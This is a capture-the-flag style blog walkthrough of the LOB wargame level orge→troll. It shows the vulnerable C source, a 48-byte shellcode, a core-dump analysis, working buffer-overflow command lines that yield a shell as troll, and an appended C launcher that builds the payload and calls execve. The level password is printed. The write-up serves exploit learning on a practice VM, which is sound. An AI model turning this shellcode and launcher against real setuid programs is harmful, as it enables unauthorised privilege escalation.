System Hacking / LOB

[LOB] orge → troll

ruming 2021. 2. 24. 21:03

Log in as orge / timewalker.

 

troll.c

[orge@localhost orge]$ ls -l
total 20
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ cat troll.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // one more!
        memset(argv[1], 0, strlen(argv[1]));
}

A check has been added so that exactly two arguments are accepted (argv[0] and argv[1]), and on top of the environment and buffer being zeroed, argv[1] is now wiped as well. Note that both memsets run after strcpy has already overwritten the saved return address, so the address placed in argv[1] still takes effect; only the shellcode needs to live somewhere that is not zeroed, and the only place left for that is argv[0].

 

One way to get shellcode into argv[0] is to create a symbolic link (or a copy) of the binary whose file name is the shellcode itself. The file name must not contain \x2f, because that byte is interpreted as the path separator /, and it cannot contain \x00 either, because that terminates the name. So I will use a shellcode that contains no \x2f.

 

48-byte shellcode with no \x2f

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

 

I copied troll to a file named after the NOP sled plus the shellcode and crashed it to get a core dump. Note the space inside the python string in the second command: the shell splits the output into two words, so argv[0] is the shellcode-named file and argv[1] is 48 bytes of \xbf.

[orge@localhost orge]$ cp troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81 "+"\xbf"*48'`
[buffer contents: 48 x \xbf, rendered as garbage by the terminal]
Segmentation fault (core dumped)

 

Analyzing the core

[orge@localhost orge]$ gdb -c core -q
Core was generated by `./[NOP sled + shellcode, rendered as garbage by the terminal]'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/1000x $esp
0xbffff960:     0x00000000      0xbffff9a4      0xbffff9b0      0x40013868
0xbffff970:     0x00000002      0x08048450      0x00000000      0x08048471
0xbffff980:     0x08048500      0x00000002      0xbffff9a4      0x08048390
0xbffff990:     0x0804866c      0x4000ae60      0xbffff99c      0x40013e90
0xbffff9a0:     0x00000002      0xbffffaa2      0xbffffb39      0x00000000
0xbffff9b0:     0xbffffb6a      0xbffffb79      0xbffffb92      0xbffffbb1
0xbffff9c0:     0xbffffbd3      0xbffffbdd      0xbffffda0      0xbffffdbf
0xbffff9d0:     0xbffffdd9      0xbffffdee      0xbffffe0a      0xbffffe15
0xbffff9e0:     0xbffffe22      0xbffffe2a      0xbffffe34      0xbffffe44
0xbffff9f0:     0xbffffe52      0xbffffe60      0xbffffe71      0xbffffe7c
0xbffffa00:     0xbffffe8c      0xbffffecc      0x00000000      0x00000003
0xbffffa10:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa20:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa30:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffa40:     0x08048450      0x0000000b      0x000001fb      0x0000000c
0xbffffa50:     0x000001fb      0x0000000d      0x000001fb      0x0000000e
0xbffffa60:     0x000001fb      0x00000010      0x0f8bfbff      0x0000000f
0xbffffa70:     0xbffffa9d      0x00000000      0x00000000      0x00000000
0xbffffa80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa90:     0x00000000      0x00000000      0x00000000      0x38366900
0xbffffaa0:     0x2f2e0036      0x90909090      0x90909090      0x90909090
0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb00:     0x90909090      0x90909090      0x315e11eb      0x8032b1c9
0xbffffb10:     0x01ff0e6c      0x7501e980      0xe805ebf6      0xffffffea
0xbffffb20:     0x6951c132      0x69743030      0x6a633069      0x51e48a6f
0xbffffb30:     0x9ae28a54      0x81ce0cb1      0x00000000      0x00000000
0xbffffb40:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb60:     0x00000000      0x00000000      0x00000000      0x00000000
...

The shellcode is visible in the dump. The argv array at 0xbffff9a4 points argv[0] at 0xbffffaa2 and argv[1] at 0xbffffb39; argv[0] starts with "./", the NOP sled runs from 0xbffffaa4, and the shellcode itself begins at 0xbffffb08 (0x315e11eb is the little-endian view of \xeb\x11\x5e\x31). I will attack with an address inside the argv[0] region.

I will pick 0xbffffae0, in the middle of the sled.

 

I attacked with the following command. Bytes 44..47 of argv[1] land on main's saved return address, written little-endian, and the top byte 0xbf is what satisfies the argv[1][47] check:

[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xe0\xfa\xff\xbf"'`
[44 x \xbf followed by \xe0\xfa\xff\xbf, rendered as garbage by the terminal]
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin

The attack succeeded!

aspirin

 

Further attempts with other return addresses:
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xf0\xfa\xff\xbf"'`
[44 x \xbf followed by \xf0\xfa\xff\xbf, rendered as garbage by the terminal]
bash$ exit
exit
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xd0\xfa\xff\xbf"'`
[44 x \xbf followed by \xd0\xfa\xff\xbf, rendered as garbage by the terminal]
bash$ exit
exit
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xa0\xfa\xff\xbf"'`
[44 x \xbf followed by \xa0\xfa\xff\xbf, rendered as garbage by the terminal]
Segmentation fault
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xb0\xfa\xff\xbf"'`
[44 x \xbf followed by \xb0\xfa\xff\xbf, rendered as garbage by the terminal]
bash$ exit
exit

Every address tested from 0xbffffab0 to 0xbffffaf0 succeeds. 0xbffffaa0 fails because it lies just before argv[0]: the string begins with "./" at 0xbffffaa2 and the NOP sled only starts at 0xbffffaa4, so any address from there up to the start of the shellcode at 0xbffffb08 lands in the sled, while 0xbffffaa0 executes the leftover bytes in front of it and crashes.
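As an added example that is not part of the original write-up, the steps above collected into a small C launcher. It builds argv[0] as the NOP sled plus the 48-byte shellcode, builds argv[1] as 44 filler bytes plus the little-endian return address, checks that a candidate shellcode is usable as a file name (no \x2f and no \x00, the constraint the cp/symlink trick depends on), and then starts the target with execve(), which sets argv[0] directly so no file named after the shellcode is needed. The path ./troll and the default return address 0xbffffae0 are assumptions taken from this post; because a different launcher changes the stack layout (no shell environment, no "./" prefix on argv[0]), the address has to be re-measured from a fresh core dump before it will hit the sled, which is why main takes the address as an optional hex argument.

```c
/* Added example, not part of the original write-up: a C launcher for the
 * troll level. It builds the two arguments the way the shell one-liners
 * above do and starts the target with execve(), which sets argv[0]
 * directly, so no file named after the shellcode is needed.
 * Assumptions: target at "./troll", default return address 0xbffffae0
 * (both taken from this post; re-measure the address with a core dump
 * when launching this way, since the stack layout differs from the shell).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP_LEN  100
#define ARG1_LEN 48   /* troll rejects strlen(argv[1]) > 48 and needs argv[1][47] == 0xbf */
#define RET_OFF  44   /* argv[1][44..47] overwrite main's saved return address */

/* 48-byte shellcode from the write-up; it contains no 0x2f ('/') byte. */
static const unsigned char shellcode[] =
    "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75"
    "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69"
    "\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81";
#define SC_LEN (sizeof(shellcode) - 1)

/* For the cp/symlink trick the shellcode doubles as a file name, so it
 * must contain neither '/' (0x2f) nor NUL (0x00). Returns 1 if usable. */
int filename_safe(const unsigned char *code, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (code[i] == 0x2f || code[i] == 0x00)
            return 0;
    return 1;
}

/* argv[0] = NOP sled + shellcode, NUL-terminated. Returns the length
 * written (without the NUL), or 0 if the buffer is too small. */
size_t build_argv0(unsigned char *out, size_t cap)
{
    size_t n = NOP_LEN + SC_LEN;
    if (cap < n + 1)
        return 0;
    memset(out, 0x90, NOP_LEN);
    memcpy(out + NOP_LEN, shellcode, SC_LEN);
    out[n] = '\0';
    return n;
}

/* argv[1] = 44 filler bytes + return address (little-endian). Its top
 * byte lands in argv[1][47], so the address must start with 0xbf for
 * troll's check to pass; returns 0 otherwise. */
int build_argv1(unsigned long ret, unsigned char *out)
{
    int i;
    if ((ret >> 24) != 0xbf)
        return 0;
    memset(out, 0xbf, RET_OFF);
    for (i = 0; i < 4; i++)
        out[RET_OFF + i] = (unsigned char)(ret >> (8 * i));
    out[ARG1_LEN] = '\0';
    return 1;
}

int main(int argc, char **argv)
{
    unsigned char a0[NOP_LEN + SC_LEN + 1];
    unsigned char a1[ARG1_LEN + 1];
    char *target_argv[3];
    char *target_envp[1];
    /* optional hex return address on the command line, e.g. bffffae0 */
    unsigned long ret = argc > 1 ? strtoul(argv[1], NULL, 16) : 0xbffffae0UL;

    if (!filename_safe(shellcode, SC_LEN) ||
        !build_argv0(a0, sizeof a0) || !build_argv1(ret, a1)) {
        fputs("payload build failed\n", stderr);
        return 1;
    }
    target_argv[0] = (char *)a0;
    target_argv[1] = (char *)a1;
    target_argv[2] = NULL;
    target_envp[0] = NULL;          /* troll zeroes the environment anyway */
    execve("./troll", target_argv, target_envp);   /* assumed target path */
    perror("execve");
    return 1;
}
```

Build it on the LOB VM with gcc -o launcher launcher.c and run ./launcher bffffae0 with whatever address the new core dump gives. With execve() the filename_safe check is only informational, since argv[0] is no longer a path; it matters for the cp/symlink approach used in the post, where the same bytes have to survive as a file name.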

 
